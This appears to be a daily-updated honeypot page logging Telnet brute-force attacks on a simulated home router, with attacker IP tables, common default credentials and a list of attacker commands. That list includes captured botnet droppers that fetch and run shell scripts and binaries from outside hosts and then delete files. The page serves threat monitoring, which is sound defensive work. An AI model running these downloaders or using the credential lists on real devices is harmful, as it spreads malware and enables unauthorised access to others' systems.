Honeypot Telnet

This page is updated daily. Last update: 2018-07-20 22:09:02 UTC

The following Telnet blacklists (updated every day, in text format) contain the IP addresses of hosts that tried to brute-force their way into my honeypot located in Italy.
The honeypot simulates a home router with a weak password and supports the most common commands.

Monthly Telnet login attempts

Attackers blacklists (IP address)

24 hours (txt)
week (txt)
year (txt)

Other information

All passwords ordered by length (txt)
HTTP URLs collected (txt)
Monthly connections (txt)

Statistics - 2018

Unique IP address: 15778
Unique username: 552
Unique password: 1338

Latest commands executed

| Timestamp | Command | IP address | AS | AS Org | Country |
|---|---|---|---|---|---|
| 2018-07-20 | enable | 121.206.50.181 | 4134 | CHINANET-BACKBONE No.31,J... | CN |
| 2018-07-20 | enable | 121.206.50.181 | 4134 | CHINANET-BACKBONE No.31,J... | CN |
| 2018-07-20 | enable | 121.206.50.181 | 4134 | CHINANET-BACKBONE No.31,J... | CN |
| 2018-07-20 | enable | 82.46.252.85 | 5089 | NTL, GB | GB |
| 2018-07-20 | enable | 85.95.166.33 | 12389 | ROSTELECOM-AS, RU | RU |
| 2018-07-20 | enable | 85.95.166.33 | 12389 | ROSTELECOM-AS, RU | RU |
| 2018-07-20 | enable | 85.95.166.33 | 12389 | ROSTELECOM-AS, RU | RU |
| 2018-07-20 | enable | 85.95.166.33 | 12389 | ROSTELECOM-AS, RU | RU |
| 2018-07-20 | enable | 85.95.166.33 | 12389 | ROSTELECOM-AS, RU | RU |
| 2018-07-20 | enable | 37.191.199.184 | 57963 | LYNET-INTERNETT-AS, NO | NO |

Most sessions per distinct IP address - 2018

| IP Address | AS | AS Org | Country |
|---|---|---|---|
| 185.12.179.208 | 200185 | XANDMAIL-ASN, DE | DE |
| 46.101.36.85 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | GB |
| 94.177.248.67 | 199883 | ARUBACLOUDLTD-ASN, GB | UNK |
| 188.166.119.55 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | NL |
| 62.211.128.95 | 3269 | ASN-IBSNAZ, IT | IT |
| 205.185.117.65 | 53667 | PONYNET FranTech Solutions, US | US |
| 171.221.218.100 | 4134 | CHINANET-BACKBONE No.31,J... | CN |
| 79.21.77.220 | 3269 | ASN-IBSNAZ, IT | IT |
| 77.218.13.66 | 1257 | TELE2, SE | SE |
| 167.99.59.89 | 14061 | DIGITALOCEAN-ASN DigitalOcean, LLC, US | UNK |

Login attempts, last 10 days

| Date | Occurrences |
|---|---|
| 2018-07-20 | 1589 |
| 2018-07-19 | 1024 |
| 2018-07-18 | 1404 |
| 2018-07-17 | 1316 |
| 2018-07-16 | 1402 |
| 2018-07-15 | 1132 |
| 2018-07-14 | 1691 |
| 2018-07-13 | 1074 |
| 2018-07-12 | 1521 |
| 2018-07-11 | 1941 |

Top usernames - 2018

Username
root
shell
enable
admin
default
guest
user
support
supervisor
Administrator

Top passwords - 2018

Password
sh
system
admin
bin
1234
12345
default
password
user
system

Top username/password pairs - 2018

Username / Password
shell / sh
enable / system
root / vizxv
root / aquario
admin / admin
root / default
user / user
shell / sh
enable / system
root / hunt5759

Top commands - 2018

Command
enable
enable
linuxsh
/bin/busybox wget http://fun.r00ts.ninja/bins/arm -O - > scanHA; /bin/busybox chmod 777 scanHA; ./scanHA telnet.scanner; /bin/busybox SORA
sh
start
PAYLOADZZZZ
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.34.237.179/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 89.34.237.179 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 89.34.237.179; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 89.34.237.179 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
ping 127.0.0.1 -c1 && sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.172.110.207/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.172.110.207 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.172.110.207; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.172.110.207 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit

See also

Detux - multiplatform Linux Sandbox
IoT bad password sheet by krebsonsecurity.com
Leaked Mirai source code for research/IoC development purposes